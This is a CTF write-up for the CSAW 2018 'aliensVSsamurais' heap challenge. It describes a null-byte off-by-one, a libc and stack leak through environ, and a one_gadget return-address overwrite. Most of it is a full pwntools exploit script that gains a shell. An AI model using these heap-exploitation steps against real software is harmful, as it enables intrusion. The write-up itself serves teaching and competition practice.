Tags: libc fastbin
Rating:
**Description**
> Construct additional pylons
>
> `nc pwn.chal.csaw.io 9004`
>
> Binary updated: 8:17 AM Sat
>
> Libc updated: 4:09 PM Sat
**Files provided**
- [`aliensVSsamurais`](https://github.com/Aurel300/empirectf/blob/master/writeups/2018-09-14-CSAW-CTF-Quals/files/alien-invasion-aliensVSsamurais)
- [`libc-2.23.so`](https://github.com/Aurel300/empirectf/blob/master/writeups/2018-09-14-CSAW-CTF-Quals/files/alien-invasion-libc-2.23.so)
**Solution** (by [Mem2019](https://github.com/Mem2019))
The sumurai part seems to be unexploitable, but there is a null byte off-by-one when we call `new_alien`
```c
v0->name[(signed int)read(0, v0->name, size)] = 0; // off by one
v1 = alien_index++;
```
so we can use null byte poisoning to do it, however, we cannot write `__malloc_hook` or `__free_hook`, but there is a pointer in the alien structure, and we can show and edit it. Thus, we can use it to leak the stack address using `environ` in libc, and then write the return address of `hatchery` to `one_gadget` with the zero precondition.
The other parts seems to be not useful, although there are many problems in this binary. However, these problems are unexploitable or hard to exploit.
exp
```python
from pwn import *
g_local=True
context.log_level='debug'
if g_local:
e = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
sh = process('./aliensVSsamurais')#env={'LD_PRELOAD':'./libc.so.6'}
ONE_GADGET_OFF = 0x4526a
UNSORTED_OFF = 0x3c4b78
gdb.attach(sh)
else:
ONE_GADGET_OFF = 0x4526a
UNSORTED_OFF = 0x3c4b78
sh = remote("pwn.chal.csaw.io", 9004)
e = ELF("./libc.so.6")
#ONE_GADGET_OFF = 0x4557a
def create(length, content):
sh.send("1\n")
sh.recvuntil("How long is my name?\n")
sh.send(str(length) + "\n")
sh.recvuntil("What is my name?\n")
sh.send(content)
sh.recvuntil("Brood mother, what tasks do we have today.\n")
def delete(idx):
sh.send("2\n")
sh.recvuntil("Which alien is unsatisfactory, brood mother?\n")
sh.send(str(idx) + "\n")
sh.recvuntil("Brood mother, what tasks do we have today.\n")
def editidx(idx, content = None):
sh.send("3\n")
sh.recvuntil("Brood mother, which one of my babies would you like to rename?\n")
sh.send(str(idx) + "\n")
sh.recvuntil("Oh great what would you like to rename ")
ret = sh.recvuntil(" to?\n")
ret = ret[:len(ret)-len(" to?\n")]
if content:
sh.send(content)
else:
sh.send(ret)
sh.recvuntil("Brood mother, what tasks do we have today.\n")
return ret
sh.recvuntil("Daimyo, nani o shitaidesu ka?\n")
sh.send("1\n")
sh.recvuntil("What is my weapon's name?\n")
sh.send("1\n")
sh.recvuntil("Daimyo, nani o shitaidesu ka?\n")
sh.send("3\n")
#use samurai to put malloc hook to 0
sh.recvuntil("Brood mother, what tasks do we have today.\n")
create(0x10, "fastbin") #0
create(0x10, "fastbin") #1
delete(0)
delete(1)
#prepare some 0x20 fastbin
create(0x210, "a") #2
create(0x100, "c") #3
create(0x100, "padding") #4
delete(2)
create(0x108, "a" * 0x108) #5
#0x111 -> 0x100
#0x20 fastbin *1
create(0x80, "b1") #6
create(0x100 - 0x90 - 0x20 - 0x10, "b2b2b2b2b2b2b2b2") #7
delete(6)
delete(3)
#0x221 unsorted bin
#0x20 *2
create(0xa0, "consume unsorted + leak") # 8
libc_addr = u64(editidx(7) + "\x00\x00") - UNSORTED_OFF
print hex(libc_addr)
delete(8)
#recover to 0x221 unsorted bin
#0x20 *2
create(0xa0, "A" * 0x88 + p64(0x21) + p64(libc_addr + e.symbols["environ"]) + p64(0xdeadbeef)) # 9
stack_addr = u64(editidx(7) + "\x00\x00")
print hex(stack_addr)
delete(9)
#leak = 0xe58
#0xd48 -> one_gadget 0x30
create(0xa0, "A" * 0x88 + p64(0x21) + p64(stack_addr - 0xe58 + 0xd48) + p64(0xdeadbeef)) # 10
editidx(7, p64(libc_addr + ONE_GADGET_OFF))
delete(10)
#0xd80 -> 0
create(0xa0, "A" * 0x88 + p64(0x21) + p64(stack_addr - 0xe58 + 0xd80) + p64(0xdeadbeef)) # 11
editidx(7, p64(0))
delete(11)
sh.interactive()
```
